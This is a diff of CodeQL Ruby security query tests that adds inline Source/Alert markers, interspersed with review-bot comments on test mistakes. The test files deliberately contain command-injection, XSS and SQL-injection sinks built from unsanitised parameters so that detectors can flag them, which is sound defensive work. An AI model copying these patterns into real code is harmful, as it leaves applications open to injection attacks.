diff --git a/ruby/ql/test/query-tests/security/cwe-078/UnsafeShellCommandConstruction/impl/sub/notImported.rb b/ruby/ql/test/query-tests/security/cwe-078/UnsafeShellCommandConstruction/impl/sub/notImported.rb index 0a385f5f6bc0..0c7c1022da2c 100644 --- a/ruby/ql/test/query-tests/security/cwe-078/UnsafeShellCommandConstruction/impl/sub/notImported.rb +++ b/ruby/ql/test/query-tests/security/cwe-078/UnsafeShellCommandConstruction/impl/sub/notImported.rb @@ -1,6 +1,6 @@ class Foobar - def foo1(target) - IO.popen("cat #{target}", "w") # NOT OK - everything assumed to be imported... + def foo1(target) # $ Source + IO.popen("cat #{target}", "w") # NOT OK - everything assumed to be imported... # $ Alert end end \ No newline at end of file diff --git a/ruby/ql/test/query-tests/security/cwe-078/UnsafeShellCommandConstruction/impl/sub/other.rb b/ruby/ql/test/query-tests/security/cwe-078/UnsafeShellCommandConstruction/impl/sub/other.rb index 22eaa13bcc02..87846abd662e 100644 --- a/ruby/ql/test/query-tests/security/cwe-078/UnsafeShellCommandConstruction/impl/sub/other.rb +++ b/ruby/ql/test/query-tests/security/cwe-078/UnsafeShellCommandConstruction/impl/sub/other.rb @@ -1,6 +1,6 @@ class Foobar - def foo1(target) - IO.popen("cat #{target}", "w") # NOT OK + def foo1(target) # $ Source + IO.popen("cat #{target}", "w") # NOT OK # $ Alert end end diff --git a/ruby/ql/test/query-tests/security/cwe-078/UnsafeShellCommandConstruction/impl/sub/other2.rb b/ruby/ql/test/query-tests/security/cwe-078/UnsafeShellCommandConstruction/impl/sub/other2.rb index 007dae343ffe..7ad8ee69d3d2 100644 --- a/ruby/ql/test/query-tests/security/cwe-078/UnsafeShellCommandConstruction/impl/sub/other2.rb +++ b/ruby/ql/test/query-tests/security/cwe-078/UnsafeShellCommandConstruction/impl/sub/other2.rb @@ -1,5 +1,5 @@ class Foobar - def foo1(target) - IO.popen("cat #{target}", "w") # NOT OK + def foo1(target) # $ Source + IO.popen("cat #{target}", "w") # NOT OK # $ Alert end end \ No newline at end of file 
diff --git a/ruby/ql/test/query-tests/security/cwe-078/UnsafeShellCommandConstruction/impl/unsafeShell.rb b/ruby/ql/test/query-tests/security/cwe-078/UnsafeShellCommandConstruction/impl/unsafeShell.rb index 487ca06ebd64..160e8c3f39c7 100644 --- a/ruby/ql/test/query-tests/security/cwe-078/UnsafeShellCommandConstruction/impl/unsafeShell.rb +++ b/ruby/ql/test/query-tests/security/cwe-078/UnsafeShellCommandConstruction/impl/unsafeShell.rb @@ -1,10 +1,10 @@ class Foobar - def foo1(target) - IO.popen("cat #{target}", "w") # NOT OK + def foo1(target) # $ Source + IO.popen("cat #{target}", "w") # NOT OK # $ Alert end - def foo2(x) - format = sprintf("cat %s", x) # NOT OK + def foo2(x) # $ Source + format = sprintf("cat %s", x) # NOT OK # $ Alert IO.popen(format, "w") end 
@@ -12,30 +12,30 @@ def fileRead1(path) File.read(path) # OK end - def my_exec(cmd, command, myCmd, myCommand, innocent_file_path) + def my_exec(cmd, command, myCmd, myCommand, innocent_file_path) # $ Source IO.popen("which #{cmd}", "w") # OK - the parameter is named `cmd`, so it's meant to be a command IO.popen("which #{command}", "w") # OK - the parameter is named `command`, so it's meant to be a command IO.popen("which #{myCmd}", "w") # OK - the parameter is named `myCmd`, so it's meant to be a command IO.popen("which #{myCommand}", "w") # OK - the parameter is named `myCommand`, so it's meant to be a command - IO.popen("which #{innocent_file_path}", "w") # NOT OK - the parameter is named `innocent_file_path`, so it's not meant to be a command + IO.popen("which #{innocent_file_path}", "w") # NOT OK - the parameter is named `innocent_file_path`, so it's not meant to be a command # $ Alert end - def escaped(file_path) + def escaped(file_path) # $ Source IO.popen("cat #{file_path.shellescape}", "w") # OK - the parameter is escaped - IO.popen("cat #{file_path}", "w") # NOT OK - the parameter is not escaped + IO.popen("cat #{file_path}", "w") # NOT OK - the parameter is not escaped # $ Alert end end require File.join(File.dirname(__FILE__), 'sub', 'other') class Foobar2 - def foo1(target) - IO.popen("cat #{target}", "w") # NOT OK + def foo1(target) # $ Source + IO.popen("cat #{target}", "w") # NOT OK # $ Alert end - def id(x) - IO.popen("cat #{x}", "w") # NOT OK - the parameter is not a constant. + def id(x) # $ Source + IO.popen("cat #{x}", "w") # NOT OK - the parameter is not a constant. # $ Alert return x end 
@@ -44,27 +44,27 @@ def thisIsSafe() end # class methods - def self.foo(target) - IO.popen("cat #{target}", "w") # NOT OK + def self.foo(target) # $ Source + IO.popen("cat #{target}", "w") # NOT OK # $ Alert end - def arrayJoin(x) - IO.popen(x.join(' '), "w") # NOT OK + def arrayJoin(x) # $ Source + IO.popen(x.join(' '), "w") # NOT OK # $ Alert - IO.popen(["foo", "bar", x].join(' '), "w") # NOT OK + IO.popen(["foo", "bar", x].join(' '), "w") # NOT OK # $ Alert end - def string_concat(x) - IO.popen("cat " + x, "w") # NOT OK + def string_concat(x) # $ Source + IO.popen("cat " + x, "w") # NOT OK # $ Alert end - def array_taint (x, y) + def array_taint (x, y) # $ Source arr = ["cat"] arr.push(x) - IO.popen(arr.join(' '), "w") # NOT OK + IO.popen(arr.join(' '), "w") # NOT OK # $ Alert arr2 = ["cat"] arr2 << y - IO.popen(arr.join(' '), "w") # NOT OK + IO.popen(arr.join(' '), "w") # NOT OK # $ Alert end end diff --git a/ruby/ql/test/query-tests/security/cwe-079/ReflectedXSS.qlref b/ruby/ql/test/query-tests/security/cwe-079/ReflectedXSS.qlref index af140959abb2..9dd84b480077 100644 --- a/ruby/ql/test/query-tests/security/cwe-079/ReflectedXSS.qlref +++ b/ruby/ql/test/query-tests/security/cwe-079/ReflectedXSS.qlref @@ -1 +1 @@ -queries/security/cwe-079/ReflectedXSS.ql +query: queries/security/cwe-079/ReflectedXSS.ql diff --git a/ruby/ql/test/query-tests/security/cwe-079/StoredXSS.qlref b/ruby/ql/test/query-tests/security/cwe-079/StoredXSS.qlref index 78de28cb2823..545a771648f9 100644 --- a/ruby/ql/test/query-tests/security/cwe-079/StoredXSS.qlref +++ b/ruby/ql/test/query-tests/security/cwe-079/StoredXSS.qlref @@ -1 +1 @@ -queries/security/cwe-079/StoredXSS.ql \ No newline at end of file +query: queries/security/cwe-079/StoredXSS.ql diff --git a/ruby/ql/test/query-tests/security/cwe-079/UnsafeHtmlConstruction.expected b/ruby/ql/test/query-tests/security/cwe-079/UnsafeHtmlConstruction.expected index 599f29e806c9..3b304c94586e 100644 
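Review bot: In `array_taint`, the second call still joins `arr` rather than `arr2`, so the `arr2 << y` path never reaches `IO.popen` and the new `# $ Alert` on that line only repeats the `arr.push(x)` case. The `.expected` file in this commit agrees: both alerts, at lines 64 and 68, name `x` at 61:20 as the source. If the intent was to cover `<<` with `y`, the line would be `IO.popen(arr2.join(' '), "w") # NOT OK # $ Alert`, and the `.expected` rows would need regenerating. The enclosing class starts outside this hunk.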
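Review bot: ReflectedXSS.qlref and StoredXSS.qlref are converted to the `query:` form but, unlike the other .qlref files visible in this patch, get no `postprocess: utils/test/InlineExpectationsTestQuery.ql` line. As written, any inline `# $ Alert` annotations in their test sources would not be checked, and the `.expected` files stay the only assertion. If that is deliberate (for example because the sources are not annotated yet), a sentence in the commit message would make that clear; otherwise add the `postprocess:` line to both.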
--- a/ruby/ql/test/query-tests/security/cwe-079/UnsafeHtmlConstruction.expected +++ b/ruby/ql/test/query-tests/security/cwe-079/UnsafeHtmlConstruction.expected @@ -1,3 +1,8 @@ +#select +| lib/unsafeHtml.rb:3:10:3:16 | #{...} | lib/unsafeHtml.rb:2:31:2:34 | name | lib/unsafeHtml.rb:3:10:3:16 | #{...} | This string interpolation which depends on $@ might later allow $@. | lib/unsafeHtml.rb:2:31:2:34 | name | library input | lib/unsafeHtml.rb:3:5:3:22 | "

#{...}

" | cross-site scripting | +| lib/unsafeHtml.rb:11:13:11:19 | #{...} | lib/unsafeHtml.rb:9:27:9:30 | name | lib/unsafeHtml.rb:11:13:11:19 | #{...} | This string interpolation which depends on $@ might later allow $@. | lib/unsafeHtml.rb:9:27:9:30 | name | library input | lib/unsafeHtml.rb:13:5:13:5 | h | cross-site scripting | +| lib/unsafeHtml.rb:17:28:17:31 | name | lib/unsafeHtml.rb:16:19:16:22 | name | lib/unsafeHtml.rb:17:28:17:31 | name | This string format which depends on $@ might later allow $@. | lib/unsafeHtml.rb:16:19:16:22 | name | library input | lib/unsafeHtml.rb:17:5:17:32 | call to sprintf | cross-site scripting | +| lib/unsafeHtml.rb:24:10:24:16 | #{...} | lib/unsafeHtml.rb:23:32:23:35 | name | lib/unsafeHtml.rb:24:10:24:16 | #{...} | This string interpolation which depends on $@ might later allow $@. | lib/unsafeHtml.rb:23:32:23:35 | name | library input | lib/unsafeHtml.rb:24:5:24:22 | "

#{...}

" | cross-site scripting | edges | lib/unsafeHtml.rb:2:31:2:34 | name | lib/unsafeHtml.rb:3:10:3:16 | #{...} | provenance | | | lib/unsafeHtml.rb:9:27:9:30 | name | lib/unsafeHtml.rb:11:13:11:19 | #{...} | provenance | | @@ -13,8 +18,3 @@ nodes | lib/unsafeHtml.rb:23:32:23:35 | name | semmle.label | name | | lib/unsafeHtml.rb:24:10:24:16 | #{...} | semmle.label | #{...} | subpaths -#select -| lib/unsafeHtml.rb:3:10:3:16 | #{...} | lib/unsafeHtml.rb:2:31:2:34 | name | lib/unsafeHtml.rb:3:10:3:16 | #{...} | This string interpolation which depends on $@ might later allow $@. | lib/unsafeHtml.rb:2:31:2:34 | name | library input | lib/unsafeHtml.rb:3:5:3:22 | "

#{...}

" | cross-site scripting | -| lib/unsafeHtml.rb:11:13:11:19 | #{...} | lib/unsafeHtml.rb:9:27:9:30 | name | lib/unsafeHtml.rb:11:13:11:19 | #{...} | This string interpolation which depends on $@ might later allow $@. | lib/unsafeHtml.rb:9:27:9:30 | name | library input | lib/unsafeHtml.rb:13:5:13:5 | h | cross-site scripting | -| lib/unsafeHtml.rb:17:28:17:31 | name | lib/unsafeHtml.rb:16:19:16:22 | name | lib/unsafeHtml.rb:17:28:17:31 | name | This string format which depends on $@ might later allow $@. | lib/unsafeHtml.rb:16:19:16:22 | name | library input | lib/unsafeHtml.rb:17:5:17:32 | call to sprintf | cross-site scripting | -| lib/unsafeHtml.rb:24:10:24:16 | #{...} | lib/unsafeHtml.rb:23:32:23:35 | name | lib/unsafeHtml.rb:24:10:24:16 | #{...} | This string interpolation which depends on $@ might later allow $@. | lib/unsafeHtml.rb:23:32:23:35 | name | library input | lib/unsafeHtml.rb:24:5:24:22 | "

#{...}

" | cross-site scripting | diff --git a/ruby/ql/test/query-tests/security/cwe-079/UnsafeHtmlConstruction.qlref b/ruby/ql/test/query-tests/security/cwe-079/UnsafeHtmlConstruction.qlref index ae814bcc35c1..501577ea1b9a 100644 --- a/ruby/ql/test/query-tests/security/cwe-079/UnsafeHtmlConstruction.qlref +++ b/ruby/ql/test/query-tests/security/cwe-079/UnsafeHtmlConstruction.qlref @@ -1 +1,2 @@ -queries/security/cwe-079/UnsafeHtmlConstruction.ql \ No newline at end of file +query: queries/security/cwe-079/UnsafeHtmlConstruction.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/ruby/ql/test/query-tests/security/cwe-079/lib/unsafeHtml.rb b/ruby/ql/test/query-tests/security/cwe-079/lib/unsafeHtml.rb index 3f92d5938b1c..b2f36f375765 100644 --- a/ruby/ql/test/query-tests/security/cwe-079/lib/unsafeHtml.rb +++ b/ruby/ql/test/query-tests/security/cwe-079/lib/unsafeHtml.rb @@ -1,27 +1,27 @@ class Foobar - def create_user_description(name) - "

#{name}

".html_safe # NOT OK - the parameter is not escaped + def create_user_description(name) # $ Source[rb/html-constructed-from-input] + "

#{name}

".html_safe # NOT OK - the parameter is not escaped # $ Alert[rb/html-constructed-from-input] # escape "

#{ERB::Util.html_escape(name)}

".html_safe # OK - the parameter is escaped end - def string_like_literal name + def string_like_literal name # $ Source[rb/html-constructed-from-input] h = <<-HTML -

#{name}

+

#{name}

# $ Alert[rb/html-constructed-from-input] HTML h.html_safe # NOT OK - the parameter is not escaped end - def sprintf_use name - sprintf("

%s

", name).html_safe # NOT OK - the parameter is not escaped + def sprintf_use name # $ Source[rb/html-constructed-from-input] + sprintf("

%s

", name).html_safe # NOT OK - the parameter is not escaped # $ Alert[rb/html-constructed-from-input] # escape sprintf("

%s

", ERB::Util.html_escape(name)).html_safe # OK - the parameter is escaped end - def create_user_description2(name) - "

#{name}

".html_safe # NOT OK - the value is not necessarily HTML safe + def create_user_description2(name) # $ Source[rb/html-constructed-from-input] + "

#{name}

".html_safe # NOT OK - the value is not necessarily HTML safe # $ Alert[rb/html-constructed-from-input] if name.html_safe? "

#{name}

".html_safe # OK - value is marked as being HTML safe diff --git a/ruby/ql/test/query-tests/security/cwe-089/ActiveRecordInjection.rb b/ruby/ql/test/query-tests/security/cwe-089/ActiveRecordInjection.rb index 3a782e529d52..e811b51e8ae3 100644 --- a/ruby/ql/test/query-tests/security/cwe-089/ActiveRecordInjection.rb +++ b/ruby/ql/test/query-tests/security/cwe-089/ActiveRecordInjection.rb @@ -7,13 +7,13 @@ class User < ApplicationRecord def self.authenticate(name, pass) # BAD: possible untrusted input interpolated into SQL fragment - find(:first, :conditions => "name='#{name}' and pass='#{pass}'") + find(:first, :conditions => "name='#{name}' and pass='#{pass}'") # $ Alert # BAD: interpolation in array argument - find(:first, conditions: ["name='#{name}' and pass='#{pass}'"]) + find(:first, conditions: ["name='#{name}' and pass='#{pass}'"]) # $ Alert # GOOD: using SQL parameters find(:first, conditions: ["name = ? and pass = ?", name, pass]) # BAD: interpolation with flow - conds = "name=#{name}" + conds = "name=#{name}" # $ Alert find(:first, conditions: conds) end @@ -27,7 +27,7 @@ class Admin < User def self.delete_by(condition = nil) # BAD: `delete_by overrides an ActiveRecord method, but doesn't perform # any validation before passing its arguments on to another ActiveRecord method - destroy_by(condition) + destroy_by(condition) # $ Alert end end 
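Review bot: In `string_like_literal` (lib/unsafeHtml.rb hunk), the added `# $ Alert[rb/html-constructed-from-input]` sits inside the `<<-HTML` heredoc body, where `#` does not start a Ruby comment. The marker therefore becomes part of the string under test, and it may not be read as an inline expectation at all. The same pattern appears in the ActiveRecordInjection.rb hunk at `User.where(<<-SQL, MAX_USER_ID)`, where `# $ Source` is appended to the `id BETWEEN '#{params[:min_id]}' AND ?` line inside the heredoc. Please confirm against the test output that the framework picks up markers from heredoc content. If it does, a comment above each heredoc would record the intent, for example `# the marker below is inside the literal on purpose: the result is reported on that line`.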
@@ -39,64 +39,64 @@ class FooController < ActionController::Base def some_request_handler # BAD: executes `SELECT AVG(#{params[:column]}) FROM "users"` # where `params[:column]` is unsanitized - User.calculate(:average, params[:column]) + User.calculate(:average, params[:column]) # $ Alert # BAD: executes `SELECT MAX(#{params[:column]}) FROM "users"` # where `params[:column]` is unsanitized - User.maximum(params[:column]) + User.maximum(params[:column]) # $ Alert # BAD: executes `DELETE FROM "users" WHERE (id = '#{params[:id]}')` # where `params[:id]` is unsanitized - User.delete_by("id = '#{params[:id]}'") + User.delete_by("id = '#{params[:id]}'") # $ Alert # BAD: executes `DELETE FROM "users" WHERE (id = '#{params[:id]}')` # where `params[:id]` is unsanitized # (in Rails < 4.0) - User.delete_all("id = '#{params[:id]}'") + User.delete_all("id = '#{params[:id]}'") # $ Alert # BAD: executes `SELECT "users".* FROM "users" WHERE (id = '#{params[:id]}')` # where `params[:id]` is unsanitized - User.destroy_by(["id = '#{params[:id]}'"]) + User.destroy_by(["id = '#{params[:id]}'"]) # $ Alert # BAD: executes `SELECT "users".* FROM "users" WHERE (id = '#{params[:id]}')` # where `params[:id]` is unsanitized # (in Rails < 4.0) - User.destroy_all(["id = '#{params[:id]}'"]) + User.destroy_all(["id = '#{params[:id]}'"]) # $ Alert # BAD: executes `SELECT "users".* FROM "users" WHERE id BETWEEN '#{params[:min_id]}' AND 100000` # where `params[:min_id]` is unsanitized - User.where(<<-SQL, MAX_USER_ID) - id BETWEEN '#{params[:min_id]}' AND ? + User.where(<<-SQL, MAX_USER_ID) # $ Alert + id BETWEEN '#{params[:min_id]}' AND ? 
# $ Source SQL # BAD: chained method case # executes `SELECT "users".* FROM "users" WHERE (NOT (user_id = 'params[:id]'))` # where `params[:id]` is unsanitized - User.where.not("user.id = '#{params[:id]}'") + User.where.not("user.id = '#{params[:id]}'") # $ Alert - User.authenticate(params[:name], params[:pass]) + User.authenticate(params[:name], params[:pass]) # $ Source # BAD: executes `SELECT "users".* FROM "users" WHERE (id = '#{params[:id]}')` LIMIT 1 # where `params[:id]` is unsanitized - User.find_or_initialize_by("id = '#{params[:id]}'") + User.find_or_initialize_by("id = '#{params[:id]}'") # $ Alert user = User.first # BAD: executes `SELECT "users".* FROM "users" WHERE id = 1 LIMIT 1 #{params[:lock]}` # where `params[:lock]` is unsanitized - user.reload(lock: params[:lock]) + user.reload(lock: params[:lock]) # $ Alert # BAD: executes `SELECT #{params[:column]} FROM "users"` # where `params[:column]` is unsanitized - User.select(params[:column]) - User.reselect(params[:column]) + User.select(params[:column]) # $ Alert + User.reselect(params[:column]) # $ Alert # BAD: executes `SELECT "users".* FROM "users" WHERE (#{params[:condition]})` # where `params[:condition]` is unsanitized - User.rewhere(params[:condition]) + User.rewhere(params[:condition]) # $ Alert # BAD: executes `UPDATE "users" SET #{params[:fields]}` # where `params[:fields]` is unsanitized - User.update_all(params[:fields]) + User.update_all(params[:fields]) # $ Alert # GOOD -- `update_all` sanitizes its bind variable arguments User.find_by(name: params[:user_name]) 
@@ -104,41 +104,41 @@ def some_request_handler # BAD -- `update_all` does not sanitize its query (array arg) User.find_by(name: params[:user_name]) - .update_all(["name = '#{params[:new_user_name]}'"]) + .update_all(["name = '#{params[:new_user_name]}'"]) # $ Alert # BAD -- `update_all` does not sanitize its query (string arg) User.find_by(name: params[:user_name]) - .update_all("name = '#{params[:new_user_name]}'") + .update_all("name = '#{params[:new_user_name]}'") # $ Alert - User.reorder(params[:direction]) + User.reorder(params[:direction]) # $ Alert - User.select('a','b', params[:column]) - User.reselect('a','b', params[:column]) - User.order('a ASC', "b #{params[:direction]}") - User.reorder('a ASC', "b #{params[:direction]}") - User.group('a', params[:column]) - User.pluck('a', params[:column]) - User.joins(:a, params[:column]) + User.select('a','b', params[:column]) # $ Alert + User.reselect('a','b', params[:column]) # $ Alert + User.order('a ASC', "b #{params[:direction]}") # $ Alert + User.reorder('a ASC', "b #{params[:direction]}") # $ Alert + User.group('a', params[:column]) # $ Alert + User.pluck('a', params[:column]) # $ Alert + User.joins(:a, params[:column]) # $ Alert - User.count_by_sql(params[:custom_sql_query]) + User.count_by_sql(params[:custom_sql_query]) # $ Alert # BAD: executes `SELECT users.* FROM #{params[:tab]}` # where `params[:tab]` is unsanitized - User.all.from(params[:tab]) + User.all.from(params[:tab]) # $ Alert # BAD: executes `SELECT "users".* FROM (SELECT "users".* FROM "users") #{params[:sq]} - User.all.from(User.all, params[:sq]) + User.all.from(User.all, params[:sq]) # $ Alert end end class BarController < ApplicationController def some_other_request_handler - ps = params + ps = params # $ Source uid = ps[:id] uidEq = "= '#{uid}'" # BAD: executes `DELETE FROM "users" WHERE (id = #{uid})` # where `uid` is unsantized - User.delete_by("id " + uidEq) + User.delete_by("id " + uidEq) # $ Alert end def safe_paths 
@@ -171,7 +171,7 @@ def safe_paths class BazController < BarController def yet_another_handler - Admin.delete_by(params[:admin_condition]) + Admin.delete_by(params[:admin_condition]) # $ Alert Source end end @@ -185,7 +185,7 @@ def index def unsafe_action name = params[:user_name] # BAD: user input passed into annotations are vulnerable to SQLi - users = User.annotate("this is an unsafe annotation:#{params[:comment]}").find_by(user_name: name) + users = User.annotate("this is an unsafe annotation:#{params[:comment]}").find_by(user_name: name) # $ Alert end end @@ -198,27 +198,27 @@ class RegressionController < ActionController::Base def index my_params = permitted_params query = "SELECT * FROM users WHERE id = #{my_params[:user_id]}" - result = Regression.find_by_sql(query) + result = Regression.find_by_sql(query) # $ Alert end def permitted_params - params.require(:my_key).permit(:id, :user_id, :my_type) + params.require(:my_key).permit(:id, :user_id, :my_type) # $ Source end def show - ActiveRecord::Base.connection.execute("SELECT * FROM users WHERE id = #{permitted_params[:user_id]}") - Regression.connection.execute("SELECT * FROM users WHERE id = #{permitted_params[:user_id]}") + ActiveRecord::Base.connection.execute("SELECT * FROM users WHERE id = #{permitted_params[:user_id]}") # $ Alert + Regression.connection.execute("SELECT * FROM users WHERE id = #{permitted_params[:user_id]}") # $ Alert end end class User - scope :with_role, ->(role) { where("role = #{role}") } + scope :with_role, ->(role) { where("role = #{role}") } # $ Alert end class UsersController < ActionController::Base def index # BAD: user input passed to scope which uses it without sanitization. - @users = User.with_role(params[:role]) + @users = User.with_role(params[:role]) # $ Source end end diff --git a/ruby/ql/test/query-tests/security/cwe-089/ArelInjection.rb b/ruby/ql/test/query-tests/security/cwe-089/ArelInjection.rb index 1cd6782b2416..707ab181e45e 100644 
--- a/ruby/ql/test/query-tests/security/cwe-089/ArelInjection.rb +++ b/ruby/ql/test/query-tests/security/cwe-089/ArelInjection.rb @@ -1,9 +1,9 @@ class PotatoController < ActionController::Base def unsafe_action - name = params[:user_name] + name = params[:user_name] # $ Source # BAD: SQL statement constructed from user input - sql = Arel.sql("SELECT * FROM users WHERE name = #{name}") - sql = Arel::Nodes::SqlLiteral.new("SELECT * FROM users WHERE name = #{name}") + sql = Arel.sql("SELECT * FROM users WHERE name = #{name}") # $ Alert + sql = Arel::Nodes::SqlLiteral.new("SELECT * FROM users WHERE name = #{name}") # $ Alert end end \ No newline at end of file diff --git a/ruby/ql/test/query-tests/security/cwe-089/PgInjection.rb b/ruby/ql/test/query-tests/security/cwe-089/PgInjection.rb index 549be4898582..c44e078ee843 100644 --- a/ruby/ql/test/query-tests/security/cwe-089/PgInjection.rb +++ b/ruby/ql/test/query-tests/security/cwe-089/PgInjection.rb @@ -3,7 +3,7 @@ class FooController < ActionController::Base def some_request_handler # A string tainted by user input is inserted into a query # (i.e a remote flow source) - name = params[:name] + name = params[:name] # $ Source # Establish a connection to a PostgreSQL database conn = PG::Connection.open(:dbname => 'postgresql', :user => 'user', :password => 'pass', :host => 'localhost', :port => '5432') 
@@ -11,14 +11,14 @@ def some_request_handler # .exec() and .async_exec() # BAD: SQL statement constructed from user input qry1 = "SELECT * FROM users WHERE username = '#{name}';" - conn.exec(qry1) - conn.async_exec(qry1) + conn.exec(qry1) # $ Alert + conn.async_exec(qry1) # $ Alert # .exec_params() and .async_exec_params() # BAD: SQL statement constructed from user input qry2 = "SELECT * FROM users WHERE username = '#{name}';" - conn.exec_params(qry2) - conn.async_exec_params(qry2) + conn.exec_params(qry2) # $ Alert + conn.async_exec_params(qry2) # $ Alert # .exec_params() and .async_exec_params() # GOOD: SQL statement constructed from sanitized user input @@ -29,7 +29,7 @@ def some_request_handler # .prepare() and .exec_prepared() # BAD: SQL statement constructed from user input qry3 = "SELECT * FROM users WHERE username = '#{name}';" - conn.prepare("query_1", qry3) + conn.prepare("query_1", qry3) # $ Alert conn.exec_prepared('query_1') # .prepare() and .exec_prepared() @@ -41,7 +41,7 @@ def some_request_handler # .prepare() and .exec_prepared() # NOT EXECUTED: SQL statement constructed from user input but not executed qry3 = "SELECT * FROM users WHERE username = '#{name}';" - conn.prepare("query_3", qry3) + conn.prepare("query_3", qry3) # $ Alert end end diff --git a/ruby/ql/test/query-tests/security/cwe-089/SqlInjection.expected b/ruby/ql/test/query-tests/security/cwe-089/SqlInjection.expected index 069cb34810fc..f1c2646afce8 100644 --- a/ruby/ql/test/query-tests/security/cwe-089/SqlInjection.expected +++ b/ruby/ql/test/query-tests/security/cwe-089/SqlInjection.expected 
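Review bot: In the last PgInjection.rb hunk, the comment `# NOT EXECUTED: SQL statement constructed from user input but not executed` now sits directly above `conn.prepare("query_3", qry3) # $ Alert`, which reads as a contradiction. A short comment saying why an alert is still expected would help, for example `# prepare() is reported as the sink even though the statement is never executed`. That reading is inferred from the matching `# $ Alert` on the earlier `conn.prepare("query_1", qry3)` line and from the `qry3` rows in SqlInjection.expected. The enclosing `some_request_handler` starts outside this hunk.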
@@ -1,3 +1,52 @@ +#select +| ActiveRecordInjection.rb:10:33:10:67 | "name='#{...}' and pass='#{...}'" | ActiveRecordInjection.rb:77:23:77:28 | call to params | ActiveRecordInjection.rb:10:33:10:67 | "name='#{...}' and pass='#{...}'" | This SQL query depends on a $@. | ActiveRecordInjection.rb:77:23:77:28 | call to params | user-provided value | +| ActiveRecordInjection.rb:10:33:10:67 | "name='#{...}' and pass='#{...}'" | ActiveRecordInjection.rb:77:38:77:43 | call to params | ActiveRecordInjection.rb:10:33:10:67 | "name='#{...}' and pass='#{...}'" | This SQL query depends on a $@. | ActiveRecordInjection.rb:77:38:77:43 | call to params | user-provided value | +| ActiveRecordInjection.rb:12:31:12:65 | "name='#{...}' and pass='#{...}'" | ActiveRecordInjection.rb:77:23:77:28 | call to params | ActiveRecordInjection.rb:12:31:12:65 | "name='#{...}' and pass='#{...}'" | This SQL query depends on a $@. | ActiveRecordInjection.rb:77:23:77:28 | call to params | user-provided value | +| ActiveRecordInjection.rb:12:31:12:65 | "name='#{...}' and pass='#{...}'" | ActiveRecordInjection.rb:77:38:77:43 | call to params | ActiveRecordInjection.rb:12:31:12:65 | "name='#{...}' and pass='#{...}'" | This SQL query depends on a $@. | ActiveRecordInjection.rb:77:38:77:43 | call to params | user-provided value | +| ActiveRecordInjection.rb:16:13:16:26 | "name=#{...}" | ActiveRecordInjection.rb:77:23:77:28 | call to params | ActiveRecordInjection.rb:16:13:16:26 | "name=#{...}" | This SQL query depends on a $@. | ActiveRecordInjection.rb:77:23:77:28 | call to params | user-provided value | +| ActiveRecordInjection.rb:30:16:30:24 | condition | ActiveRecordInjection.rb:174:21:174:26 | call to params | ActiveRecordInjection.rb:30:16:30:24 | condition | This SQL query depends on a $@. | ActiveRecordInjection.rb:174:21:174:26 | call to params | user-provided value | +| ActiveRecordInjection.rb:42:30:42:44 | ...[...] 
| ActiveRecordInjection.rb:42:30:42:35 | call to params | ActiveRecordInjection.rb:42:30:42:44 | ...[...] | This SQL query depends on a $@. | ActiveRecordInjection.rb:42:30:42:35 | call to params | user-provided value | +| ActiveRecordInjection.rb:46:18:46:32 | ...[...] | ActiveRecordInjection.rb:46:18:46:23 | call to params | ActiveRecordInjection.rb:46:18:46:32 | ...[...] | This SQL query depends on a $@. | ActiveRecordInjection.rb:46:18:46:23 | call to params | user-provided value | +| ActiveRecordInjection.rb:50:20:50:42 | "id = '#{...}'" | ActiveRecordInjection.rb:50:29:50:34 | call to params | ActiveRecordInjection.rb:50:20:50:42 | "id = '#{...}'" | This SQL query depends on a $@. | ActiveRecordInjection.rb:50:29:50:34 | call to params | user-provided value | +| ActiveRecordInjection.rb:55:21:55:43 | "id = '#{...}'" | ActiveRecordInjection.rb:55:30:55:35 | call to params | ActiveRecordInjection.rb:55:21:55:43 | "id = '#{...}'" | This SQL query depends on a $@. | ActiveRecordInjection.rb:55:30:55:35 | call to params | user-provided value | +| ActiveRecordInjection.rb:59:21:59:45 | call to [] | ActiveRecordInjection.rb:59:31:59:36 | call to params | ActiveRecordInjection.rb:59:21:59:45 | call to [] | This SQL query depends on a $@. | ActiveRecordInjection.rb:59:31:59:36 | call to params | user-provided value | +| ActiveRecordInjection.rb:64:22:64:46 | call to [] | ActiveRecordInjection.rb:64:32:64:37 | call to params | ActiveRecordInjection.rb:64:22:64:46 | call to [] | This SQL query depends on a $@. | ActiveRecordInjection.rb:64:32:64:37 | call to params | user-provided value | +| ActiveRecordInjection.rb:68:16:68:21 | <<-SQL | ActiveRecordInjection.rb:69:21:69:26 | call to params | ActiveRecordInjection.rb:68:16:68:21 | <<-SQL | This SQL query depends on a $@. 
| ActiveRecordInjection.rb:69:21:69:26 | call to params | user-provided value | +| ActiveRecordInjection.rb:75:20:75:47 | "user.id = '#{...}'" | ActiveRecordInjection.rb:75:34:75:39 | call to params | ActiveRecordInjection.rb:75:20:75:47 | "user.id = '#{...}'" | This SQL query depends on a $@. | ActiveRecordInjection.rb:75:34:75:39 | call to params | user-provided value | +| ActiveRecordInjection.rb:81:32:81:54 | "id = '#{...}'" | ActiveRecordInjection.rb:81:41:81:46 | call to params | ActiveRecordInjection.rb:81:32:81:54 | "id = '#{...}'" | This SQL query depends on a $@. | ActiveRecordInjection.rb:81:41:81:46 | call to params | user-provided value | +| ActiveRecordInjection.rb:86:23:86:35 | ...[...] | ActiveRecordInjection.rb:86:23:86:28 | call to params | ActiveRecordInjection.rb:86:23:86:35 | ...[...] | This SQL query depends on a $@. | ActiveRecordInjection.rb:86:23:86:28 | call to params | user-provided value | +| ActiveRecordInjection.rb:90:17:90:31 | ...[...] | ActiveRecordInjection.rb:90:17:90:22 | call to params | ActiveRecordInjection.rb:90:17:90:31 | ...[...] | This SQL query depends on a $@. | ActiveRecordInjection.rb:90:17:90:22 | call to params | user-provided value | +| ActiveRecordInjection.rb:91:19:91:33 | ...[...] | ActiveRecordInjection.rb:91:19:91:24 | call to params | ActiveRecordInjection.rb:91:19:91:33 | ...[...] | This SQL query depends on a $@. | ActiveRecordInjection.rb:91:19:91:24 | call to params | user-provided value | +| ActiveRecordInjection.rb:95:18:95:35 | ...[...] | ActiveRecordInjection.rb:95:18:95:23 | call to params | ActiveRecordInjection.rb:95:18:95:35 | ...[...] | This SQL query depends on a $@. | ActiveRecordInjection.rb:95:18:95:23 | call to params | user-provided value | +| ActiveRecordInjection.rb:99:21:99:35 | ...[...] | ActiveRecordInjection.rb:99:21:99:26 | call to params | ActiveRecordInjection.rb:99:21:99:35 | ...[...] | This SQL query depends on a $@. 
